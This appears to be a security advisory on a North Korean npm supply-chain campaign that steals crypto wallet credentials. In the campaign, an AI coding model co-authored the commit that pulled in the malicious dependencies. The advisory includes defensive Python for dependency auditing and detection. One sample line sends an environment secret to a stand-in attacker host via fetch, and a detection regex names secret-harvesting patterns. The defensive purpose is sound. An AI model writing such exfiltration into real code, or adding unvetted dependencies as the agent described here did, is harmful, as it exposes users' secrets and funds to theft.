Severity: HIGH (significant risk · prioritise patching) · Relevance: 8.5 · Frameworks: MITRE ATLAS, OWASP LLM Top 10

DPRK Actors Use Claude LLM to Inject Malware Into npm Supply Chain

TL;DR
  • What happened: DPRK actors used Anthropic's Claude Opus to co-author a commit introducing malicious npm packages that target crypto wallet credentials through autonomous AI agents.
  • Who's at risk: Developers building on Solana blockchain tooling and autonomous AI trading agents are most exposed due to compromised dependency chains.
  • Act now: Audit all npm dependencies — especially second- and third-tier transitive packages — for unexpected recent commits · Restrict AI coding agents from autonomously adding or modifying project dependencies without human review · Monitor LLM-generated code commits in CI/CD pipelines for dependency injection and secret exfiltration patterns

Overview

Cybersecurity researchers at ReversingLabs have uncovered a sophisticated npm supply chain campaign — codenamed PromptMink — attributed to the North Korean threat actor Famous Chollima (also tracked as Shifty Corsair). The campaign marks a notable evolution in DPRK offensive operations: malicious code was introduced via a commit co-authored by Anthropic’s Claude Opus LLM, effectively weaponising AI coding agents as an attack delivery mechanism. The end goal is theft of cryptocurrency wallet credentials and funds from victim environments.

Technical Analysis

The attack operates through a multi-layer npm dependency chain designed to frustrate detection:

  • First-layer packages (e.g., @solana-launchpad/sdk, @meme-sdk/trade, @pumpfun-ipfs/sdk) appear legitimate and contain no malicious code. They import large volumes of genuinely popular packages (axios, bn.js) to appear credible alongside a small number of malicious second-layer dependencies.
  • Second-layer packages (e.g., @validate-sdk/v2) embed the actual payload: credential harvesting logic targeting crypto wallet secrets from the compromised environment.
  • A February 2026 commit to the openpaw-graveyard autonomous AI agent project — co-authored by Claude Opus — introduced @solana-launchpad/sdk as a dependency, initiating the infection chain.
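Because the payload lives only in the second layer, a review of `package.json` alone never surfaces it; only a walk of the resolved dependency graph does. The sketch below illustrates this with the package names reported in the campaign, though the graph structure itself is a hypothetical reconstruction, not the actual lock-file contents:

```python
# Walk a resolved dependency graph (the kind of map found in a
# package-lock.json) and report every package reachable only
# transitively, i.e. the second- and third-layer candidates an
# audit should focus on. Graph contents are illustrative.

def transitive_only(graph: dict[str, list[str]], direct: set[str]) -> set[str]:
    """Return packages reachable from `direct` but not listed in it."""
    seen, stack = set(direct), list(direct)
    while stack:
        for dep in graph.get(stack.pop(), []):
            if dep not in seen:
                seen.add(dep)
                stack.append(dep)
    return seen - direct

graph = {
    "@solana-launchpad/sdk": ["axios", "bn.js", "@validate-sdk/v2"],
    "axios": [], "bn.js": [], "@validate-sdk/v2": [],
}
direct = {"@solana-launchpad/sdk"}  # all that package.json shows
print(sorted(transitive_only(graph, direct)))
# → ['@validate-sdk/v2', 'axios', 'bn.js']
```

The point of the pattern: the malicious package never appears in the manifest developers review, only in the transitive set.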

The malicious package @validate-sdk/v2, uploaded to npm in October 2025, is described as a utility SDK for hashing and validation but functions as a secrets exfiltrator. The package shows signs of vibe-coding — rapid AI-assisted generation — consistent with DPRK’s documented use of generative AI to accelerate development operations.
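A secrets exfiltrator of the kind described usually leaves crude static indicators: code that reads secret-like values and also makes outbound calls. A minimal heuristic scan, sketched below with illustrative patterns and a fabricated sample (neither reflects the real @validate-sdk/v2 payload):

```python
import re

# Crude static indicators of a secrets exfiltrator in JavaScript
# source: harvesting secret-like values combined with an outbound
# network call. Patterns and sample are illustrative only.
READS = re.compile(r"process\.env|keypair|mnemonic|secretKey", re.I)
SENDS = re.compile(r"fetch\(|https?\.request|axios\.(get|post)", re.I)

def looks_like_exfiltrator(source: str) -> bool:
    """Flag source that both reads secret-like values and phones home."""
    return bool(READS.search(source) and SENDS.search(source))

sample = """
const k = process.env.WALLET_SECRET_KEY;
fetch("https://attacker.example/c2", { method: "POST", body: k });
"""
print(looks_like_exfiltrator(sample))  # True
```

Heuristics like this produce false positives on legitimate HTTP clients, so they are a triage filter for manual review, not a verdict.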

When second-layer packages are detected and removed from npm, the threat actors rapidly replace them, ensuring persistence across the dependency graph.

Additional evasion techniques include:

  • Function shadowing: Creating malicious reimplementations of functions found in legitimate popular libraries
  • Typosquatting: Package names and descriptions closely mimicking trusted libraries
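Typosquats can often be caught with a simple similarity check against an allowlist of the packages a team actually intends to use. A hedged sketch follows; the allowlist, candidate names, and 0.8 threshold are illustrative choices, not the campaign's real lookalikes:

```python
from difflib import SequenceMatcher

# Packages the team has deliberately approved (illustrative list).
TRUSTED = {"axios", "bn.js", "lodash", "express"}

def typosquat_suspects(candidates, trusted=TRUSTED, threshold=0.8):
    """Flag names very similar to, but not identical to, a trusted
    package name -- a common typosquatting tell."""
    suspects = []
    for name in candidates:
        for good in trusted:
            ratio = SequenceMatcher(None, name, good).ratio()
            if name != good and ratio >= threshold:
                suspects.append((name, good, round(ratio, 2)))
    return suspects

print(typosquat_suspects(["axios", "axi0s", "lodahs", "left-pad"]))
# → [('axi0s', 'axios', 0.8), ('lodahs', 'lodash', 0.83)]
```

Exact matches pass, genuinely unrelated names pass, and near-misses are flagged for a human to inspect before install.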

Framework Mapping

Framework   | Reference                                   | Rationale
MITRE ATLAS | AML.T0010 – ML Supply Chain Compromise      | Malicious packages injected via LLM-assisted commits into AI agent dependency chains
MITRE ATLAS | AML.T0047 – ML-Enabled Product or Service   | Autonomous AI trading agent used as the attack vector
OWASP LLM   | LLM05 – Supply Chain Vulnerabilities        | Compromised npm packages consumed by LLM-generated agent code
OWASP LLM   | LLM08 – Excessive Agency                    | Autonomous agent executed malicious dependencies without human oversight
OWASP LLM   | LLM02 – Insecure Output Handling            | LLM-generated code introduced unvetted external dependencies

Impact Assessment

Developers building Solana-based autonomous AI agents — particularly those using the Tapestry Protocol, Bankr, or Moltbook integrations — are most directly at risk. Victims face credential exfiltration leading to cryptocurrency wallet draining. The use of an LLM as a co-author of a malicious commit raises broader concerns: AI coding assistants that autonomously manage dependencies represent a significant and underappreciated attack surface for supply chain compromise at scale.

Mitigation & Recommendations

  1. Enforce dependency review gates: Require human approval for any dependency additions in CI/CD pipelines, especially those introduced by AI coding agents.
  2. Audit transitive dependencies: Use tools such as npm audit, Socket.dev, or Phylum to inspect second- and third-tier packages for suspicious recent commits or low download counts paired with high-value function names.
  3. Restrict agent permissions: Autonomous AI agents should operate under least-privilege principles and must not have write access to package manifests without explicit authorisation.
  4. Monitor for credential exfiltration patterns: Deploy runtime controls to detect unusual outbound network calls from build or agent environments.
  5. Verify commit provenance: Treat LLM co-authored commits with the same scrutiny as unverified external contributors.
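Recommendation 1 can be enforced mechanically: a CI step diffs the manifest against the previous commit and fails the build when dependencies change without sign-off. A minimal sketch, assuming plain package.json snapshots (the version string for the campaign package is hypothetical):

```python
import json

def dependency_changes(old_manifest: str, new_manifest: str) -> dict:
    """Diff the "dependencies" maps of two package.json snapshots and
    return the additions, version changes, and removals that should
    require explicit human approval before merge."""
    old = json.loads(old_manifest).get("dependencies", {})
    new = json.loads(new_manifest).get("dependencies", {})
    return {
        "added": {p: v for p, v in new.items() if p not in old},
        "changed": {p: (old[p], v) for p, v in new.items()
                    if p in old and old[p] != v},
        "removed": sorted(p for p in old if p not in new),
    }

before = '{"dependencies": {"axios": "^1.6.0"}}'
after = '{"dependencies": {"axios": "^1.6.0", "@solana-launchpad/sdk": "^2.1.0"}}'
changes = dependency_changes(before, after)
print(changes["added"])  # {'@solana-launchpad/sdk': '^2.1.0'}
# A gate would fail the build when "added" or "changed" is non-empty
# and the commit lacks a human approval label.
```

This catches exactly the PromptMink entry point: a dependency silently added by an AI co-authored commit.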
